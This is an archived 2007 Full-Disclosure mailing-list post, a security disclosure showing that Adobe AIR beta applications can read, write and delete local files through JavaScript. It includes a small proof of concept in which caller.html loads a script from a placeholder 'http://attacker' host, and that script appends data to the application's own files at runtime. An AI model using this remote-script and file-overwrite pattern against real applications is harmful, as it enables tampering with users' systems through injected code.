lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <261F3131-9062-48F9-A631-D4F5569124F9@sektioneins.de>
Date: Tue, 3 Jul 2007 17:24:01 +0200
From: fukami <fukami@...tioneins.de>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Cc: websecurity@...appsec.org, bugtraq@...urityfocus.com
Subject: Security on AIR: Local file access through JavaScript 

Hi!

It's just a very first look to AIR (Adobes Integrated Runtime) and  
its possibilities to process HTML/JS. AIR is beta by now, so Adobe  
may change things in the final release.

## What is AIR?
Quote from Adobe: "Adobe Integrated Runtime (AIR) is a cross- 
operating system runtime that allows you to leverage your existing  
web development skills (Flash, Flex, HTML, JavaScript, Ajax) to build  
and deploy Rich Internet Applications (RIAs) to the desktop."


## Some security related informations on AIR:
- The installer throws a warning about it's ability for unrestricted  
system access (so it's not a real surprise what AIR apps are capable of)
- AIR uses WebKit as renderer on both supported platforms, Windows  
and MacOS
- AIR introduces some JavaScript functions to access file systems and  
remote services, file SQL queries and open sockets
- SWF files in the AIR application sandbox can cross-script any SWF  
file from any domain
- Remote SWF files can only read files inside the security sandbox
- SWF/ActionScript objects can access DOM and JavaScript (and vice  
versa I guess)
- External JavaScript sources can be included and executed


## File access
In general every file on local file system can be accessed by AIR  
apps. This includes reading, writing, appending or deletion as well  
as testing for file and directory existence. Another interesting  
feature is the possibility to overwrite calling files inside compiled  
AIR application during runtime.


## Example (only tested on OSX so far)
For this to work in a real world scenario a service used by an AIR  
app must be vulnerable to a persistant XSS (or another typical  
vulnerability), and the app needs to call data in a way that payloads  
gets rendered and executed.

This basic example consists of 4 files:
- AIR application descriptor file: App.xml
- Calling HTML file inside the AIR app package: caller.html
- Malicious external JavaScript: overwrite.js
- A file which just contains aliases for AIR runtime: AIRAliases.js  
(part of AIR SDK)

# App.xml
<?xml version="1.0" encoding="UTF-8"?>
<application xmlns="http://ns.adobe.com/air/application/1.0.M4"  
appId="air.poc.overwrite" version="0.1">
<name>AIR Overwrite</name>
<rootContent systemChrome="standard" visible="true">caller.html</ 
rootContent>
</application>

# caller.html
# For lazyness reasons the JS is included straight away
# But it also works if exploited and included during runtime
<html>
<head>
<title>AIR Overwrite</title>
<script src="AIRAliases.js" type="text/javascript"></script>
<script src="http://attacker/overwrite.js" type="text/javascript"></ 
script>
</head>
<body onload="remoteLoad()">
<h1>local data</h1>
</body>
</html>

# overwrite.js
function remoteLoad(){
   var localFile = air.File.documentsDirectory;
   localFile = localFile.resolve("/local/path/to/aip/resources/ 
caller.html");
   // i.e. on MacOS: /Applications/AIR-overwrite.air/Contents/ 
Resources/caller.html
   var localFileStream = new air.FileStream();
   localFileStream.open(localFile, air.FileMode.APPEND);
   localFileStream.writeUTFBytes("data from remote");
}

To compile, the AIR SDK must be installed (beside the actual  
runtime). The bin of the SDK dir contains ADT, a command-line tool to  
generate AIR files:
$ adt -package AIR-overwrite.air App.xml AIRAliases.js caller.html

After installing and running AIR-overwrite.app, "data from remote" is  
appended to caller.html. Another interesting point for overwriting  
inside AIR apps could be META-INF/application.xml which contains the  
pointers to the resources or certificates.

The example is kinda lame, I know. With such remote access much  
fancier stuff is imaginable. But what I found somehow funny is the  
fact that AIR doesn't have any mechanism to recognize changes to its  
own files.


## Conclusion
Macromedia/Adobe Flash has a long history of bad or no security, so  
AIR seems to stay in that long tradition. By introducing those PNDF  
("Potentially Dangerous Native Functions" - thanks to Wisec for  
making up this term :) Adobe opens new vectors XSS can cause. Stuff  
like SameOrigin policies and access restrictions are there for a very  
good and known reason. Adobe seem to know about the security  
implications as they describe in their developer docs, but  
nonetheless it doesn't makes it any better from my point of view.

There are already some real world services/sites offering AIR where  
exploitation works the way described.


## URLs:
- AIR installer
   http://labs.adobe.com/downloads/air.html
- AIR SDK
   http://labs.adobe.com/downloads/airsdk.html


   fukami

-- 
SektionEins GmbH
http://sektioneins.de


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ